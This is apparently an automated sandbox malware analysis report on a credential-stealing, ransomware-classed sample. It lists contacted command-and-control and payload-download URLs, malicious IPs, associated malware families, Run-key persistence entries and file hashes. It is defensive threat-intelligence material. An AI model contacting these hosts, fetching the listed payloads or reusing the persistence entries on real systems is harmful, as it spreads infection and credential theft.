http://x1.i.lencr.org/0	75f24a4b40.exe, 00000008.00000003.3080411855.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3253809541.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apiyzf	75f24a4b40.exe, 00000008.00000003.3142558119.00000000014AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/W	9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000001007000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bs	H3tyh96.exe, 00000007.00000002.3359474514.000000000531C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	75f24a4b40.exe, 00000030.00000003.3276738308.0000000005713000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api2gJ	75f24a4b40.exe, 00000030.00000003.3245713550.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3250888626.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000002.3356857196.0000000005476000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3249076983.000000000547B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.3089463536.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3084016917.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3173110956.0000000006207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3194052171.0000000005518000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microO	powershell.exe, 00000026.00000002.3192853264.0000000007B4B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://atten-supporse.biz/P0	75f24a4b40.exe, 00000030.00000003.3140153337.000000000074C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	H3tyh96.exe, 00000007.00000002.3695352181.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000003.2996933604.00000000072CC000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2974169586.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2973714041.0000000005BED000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.2977204567.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3143767669.000000000542B000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000003.3164011970.0000000005428000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api?	75f24a4b40.exe, 00000008.00000002.3295583956.0000000005C47000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3238794806.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3239359046.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3144279007.0000000005C46000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/steam/random.exe	skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microZ	powershell.exe, 00000026.00000002.3121758184.00000000033DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	75f24a4b40.exe, 00000008.00000003.3110628531.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3110457516.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp	false		high
https://atten-supporse.biz/apiXv	75f24a4b40.exe, 00000008.00000003.3110316776.0000000005C41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.newtonsoft.com/jsonschema	H3tyh96.exe, 00000007.00000002.3359474514.0000000005256000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005EFF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3695352181.0000000005FEF000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3715237584.000000000A840000.00000004.10000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
205.209.109.10	unknown	United States	19318	IS-AS-1US	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
104.21.32.1	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false
162.159.128.233	discord.com	United States	13335	CLOUDFLARENETUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572277
Start date and time:	2024-12-10 11:09:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	65
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@103/144@86/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 67% Number of executed functions: 264 Number of non-executed functions: 84
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 35.85.93.176, 54.200.77.17, 44.228.225.150, 52.168.117.173, 172.217.17.78, 88.221.134.209, 88.221.134.155, 13.107.246.63, 52.149.20.212, 20.190.181.5, 23.218.208.109
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, shavar.prod.mozaws.net, ciscobinary.openh264.org, otelrules.azureedge.net, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, ctldl.windowsupdate.com, a17.rackcdn.com.mdc.edgesuite.net, detectportal.prod.mozaws.net, aus5.mozilla.org, fe3cr.delivery.mp.microsoft.com, a19.dscg10.akamai.net, ocsp.digicert.com, redirector.gvt1.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, location.services.mozilla.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
05:11:01	API Interceptor	1069x Sleep call for process: skotes.exe modified
05:11:24	API Interceptor	36x Sleep call for process: 75f24a4b40.exe modified
05:11:26	API Interceptor	148x Sleep call for process: powershell.exe modified
05:11:45	API Interceptor	99x Sleep call for process: H3tyh96.exe modified
05:12:02	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:10:00	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
11:11:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 75f24a4b40.exe C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe
11:11:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9e4b3ff3c2.exe C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe
11:11:48	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ae44c30d83.exe C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe
11:11:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2fdabbc809.exe C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe
11:12:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 75f24a4b40.exe C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe
11:12:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9e4b3ff3c2.exe C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe
11:12:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ae44c30d83.exe C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe
11:12:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2fdabbc809.exe C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
205.209.109.10	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse
205.209.109.10	file.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse
208.95.112.1	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Wh2c6sgwRo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	ip-api.com/line/?fields=hosting
	mu3JuAyrj5.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ip-api.com/json/
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	ip-api.com/json/?fields=8195
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	ip-api.com/line/?fields=hosting
	run.cmd	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=8195
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	f5ATZ1i5CU.exe	Get hash	malicious	RedLine, XWorm	Browse	ip-api.com/line/?fields=hosting
	R55-RFQ.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
example.org	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
services.addons.mozilla.org	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
prod.detectportal.prod.cloudops.mozgcp.net	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.107.221.82

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
IS-AS-1US	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	205.209.109.10
	file.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	205.209.109.10
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	74.50.69.234
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	74.50.69.234
	https://hujalconcretos.com/npp	Get hash	malicious	Unknown	Browse	216.219.90.9
	creatednew.hta	Get hash	malicious	Cobalt Strike, DBatLoader, HTMLPhisher	Browse	216.158.238.61
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	173.225.100.128
	https://herald-review.com/users/logout-success/?expire=1626371676&referer_url=http://209.159.152.50	Get hash	malicious	HTMLPhisher	Browse	209.159.152.50
	electrum-doge.exe.virus.exe	Get hash	malicious	RMSRemoteAdmin, Remote Utilities	Browse	64.20.61.146
	s.msi.virus.msi	Get hash	malicious	RMSRemoteAdmin, Remote Utilities	Browse	66.23.226.254
TUT-ASUS	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Wh2c6sgwRo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	208.95.112.1
	mu3JuAyrj5.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	208.95.112.1
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	208.95.112.1
	run.cmd	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	208.95.112.1
	file.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	f5ATZ1i5CU.exe	Get hash	malicious	RedLine, XWorm	Browse	208.95.112.1
	R55-RFQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
CLOUDFLARENETUS	EEMsLiXoiTzoaDd.scr	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Rep_ort2024Dec9.pdf	Get hash	malicious	Captcha Phish	Browse	172.67.139.242
	https://auth.ball.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	nanophanotool.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.163.8
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.48.1
	letter_sjoslin_odeonuk.com.pdf	Get hash	malicious	Unknown	Browse	104.17.55.22
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	162.159.135.234
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	104.20.3.235

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	EEMsLiXoiTzoaDd.scr	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.196.114 162.159.128.233
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.196.114 162.159.128.233
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	172.67.196.114 162.159.128.233
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	172.67.196.114 162.159.128.233
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	172.67.196.114 162.159.128.233
	c2.hta	Get hash	malicious	XWorm	Browse	172.67.196.114 162.159.128.233
	iboka6.hta	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.128.233
	Statement 2024-11-29 (K07234).exe	Get hash	malicious	AgentTesla	Browse	172.67.196.114 162.159.128.233
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.196.114 162.159.128.233
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	172.67.196.114 162.159.128.233
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	nanophanotool.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.32.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	sjoslin@odeonuk.com_print.svg	Get hash	malicious	Unknown	Browse	104.21.32.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.32.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	SC3sPWT51E.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	4C1bAkWboc.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_33aff8b3a22dbaf8353e7499fe0f8a940e360e8_79f63236_c33352ba-a302-4a0a-9bad-796673328cbe\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0118788326824644
Encrypted:	false
SSDEEP:	192:0e8X+k8QmJ00BU/Sa6ceLSzuiFGZ24IO8alc:+kQmBBU/Sar8SzuiFGY4IO8aG
MD5:	130EB700E6C23BE5BE5407747385FE97
SHA1:	A509CB46EF2A1F66F8847874D2AA31D1D64F7F6F
SHA-256:	E38B6B74E5B92FA9A8114AA984554B5C6218BD56212CDA448FDB499E5A74ED26
SHA-512:	64C0681FEE6798B14DE35FA288F6F41E69169A0C852F8F0AE349381C7A9AE21AE896248EC29ADB0B19294685A69DEF992FB9A8C9A06D45291D59AEA4E0E29D88
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.9.9.0.8.5.6.5.8.6.8.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.9.9.0.8.6.7.6.4.1.5.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.3.3.5.2.b.a.-.a.3.0.2.-.4.a.0.a.-.9.b.a.d.-.7.9.6.6.7.3.3.2.8.c.b.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.c.d.8.3.7.0.-.9.a.4.7.-.4.e.a.0.-.8.4.7.b.-.2.5.6.4.b.e.4.b.3.d.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.0.-.0.0.0.1.-.0.0.1.4.-.5.e.a.2.-.5.f.d.e.e.b.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B5C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 10 10:11:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	213125
Entropy (8bit):	3.817170873045375
Encrypted:	false
SSDEEP:	1536:H80KTOpN4uE2aOH19LTg8EtqSVXWqAX0dCDS4satTJQZxwuBojRml5:H83E4uEqV9LTgbqyo3S4sE1QbUm
MD5:	8FA93A066E5604566D56B9C7F8B82916
SHA1:	0B25D3F2CE4DEB7FF731FF001666EC1DCB5FDA69
SHA-256:	4B09658E211948589836B4F887DE77EC4093AC894DAFBA09B464F2EA051B358C
SHA-512:	97714D3EB44B7AE818BA0A65E9FB9A61CB6FC4F35A3A88314B09AC9FE7C3E3675B569418890A2D51690F26F59C4F7367082B3A32A75FBA3C4F06125A91810B3D
Malicious:	false
Preview:	MDMP..a..... .........Xg........................D...........<...........T....>..........`.......8...........T............'..........................................................................................................eJ..............GenuineIntel............T.............Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D41.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8362
Entropy (8bit):	3.6932255197617243
Encrypted:	false
SSDEEP:	192:R6l7wVeJPF6Od6Y7QT6jl3gmfZdu+LprD89bxJsfF+bm:R6lXJd6a6YA6hgmfDu+yxifJ
MD5:	600F1D9880DB76E77B364307845D5376
SHA1:	FC4A101692E9D2F79AFD6FBDF2552C881003F72A
SHA-256:	6F463E58C8A06786D60933CB6EE4BADB49E2F205C281B9B508D277F6795DC374
SHA-512:	D22824FBC68283533C9DE429A67851DE74ED362D166BD06429E5CDCFC25E90F2BF392804E5C44F6AF21DB5E8DA4E9454AECA0E088C48BD9444239AF58C5737BB
Malicious:	false
